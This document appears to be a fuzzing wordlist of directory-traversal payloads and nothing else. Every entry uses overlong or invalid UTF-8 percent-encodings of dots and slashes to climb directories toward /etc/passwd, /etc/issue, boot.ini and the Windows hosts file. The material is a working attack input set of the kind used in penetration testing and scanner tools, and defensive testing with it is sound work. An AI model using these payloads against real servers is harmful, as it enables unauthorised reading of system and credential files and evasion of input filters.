-%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vetc%c0%9vissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9v%f8%80%80%80%ae%f8%80%80%80%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfetc%c0%qfissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qf%f8%80%80%80%ae%f8%80%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8spasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8sissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8sboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8spasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8sissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8sboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8spasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8sissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8sboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8spasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8sissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8sboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8spasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8sissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8sboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8spasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8setc%c1%8sissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8sboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8s%f8%80%80%80%ae%f8%80%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cetc%c1%1cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1c%f8%80%80%80%ae%f8%80%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afetc%c1%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%af%f8%80%80%80%ae%f8%80%80%80%ae%c1%afboot.ini 